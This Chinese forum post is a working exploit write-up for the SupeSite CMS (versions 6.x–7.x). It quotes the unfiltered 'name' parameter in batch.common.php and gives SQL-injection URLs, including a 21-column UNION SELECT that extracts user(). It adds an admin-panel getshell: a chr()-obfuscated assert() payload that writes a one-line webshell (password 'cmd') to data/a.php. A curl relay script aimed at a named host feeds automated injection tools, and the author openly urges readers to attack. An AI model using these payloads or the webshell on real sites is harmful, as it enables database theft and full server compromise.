试了6.x 7.x 其他版本没测试, 大家自己测试下吧
[php]
batch.common.php (218) :
} elseif ($action == 'modelquote') {
//模型评论引用
$name = empty($_GET['name'])?'':trim($_GET['name']); //无过滤
$cid = empty($_GET['cid'])?0:intval($_GET['cid']);
$html = false;
if(!empty($name) && !empty($cid)) {
$item = array();
$query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=/''.$cid.'/''); //tname处理 然后带入
if($item = $_SGLOBAL['db']->fetch_array($query)) {
$item['message'] = preg_replace("/
$html = '';
showxml($html);
}
}
showxml($html);
}
[/php]
我们再看看tname函数
[php]
function/common.func.php (601) :
function tname($name, $mode=0) {
global $_SC;
if($mode == 1) {
return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`';
} elseif ($mode == 2) {
return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`';
} else {
return $_SC['tablepre'].$name;
}
}[/php]
依然没过滤, 他都不管了你了 你还不注入吗?
exp:
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] #
这个后面可以直接order by了 你懂的
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #
由于版本不同, 所以字段数不一样, 建议先orderby判断下来, 比如7.5的, 就是21个字段, 直接丢个7.5的exp吧
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23
也可以配置好了,直接丢注入攻击跑
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2
关于SupeSite 7.5后台GETSHELL
新的拿shell方法, 和uchome的如出一辙
http://www.xxx.com/admincp.php?action=usrblocks&blocktype=&op=addblockcode
[php]
@assert(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));
?>
[/php]
调用:http://www.xxx.com/batch.javascript.php?bid=1650 ,即在data下生成一句话木马a.php,密码为cmd
附上一个中转的脚本
<?php set_time_limit(0); $id=$_GET["id"]; $id=str_replace(" ","%20",$id); $id=str_replace("=","%3D",$id); $url = "http://blog.0day5.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; //更改为你需要提交的地址 echo $url; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
直接拿着工具就可以跑了
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论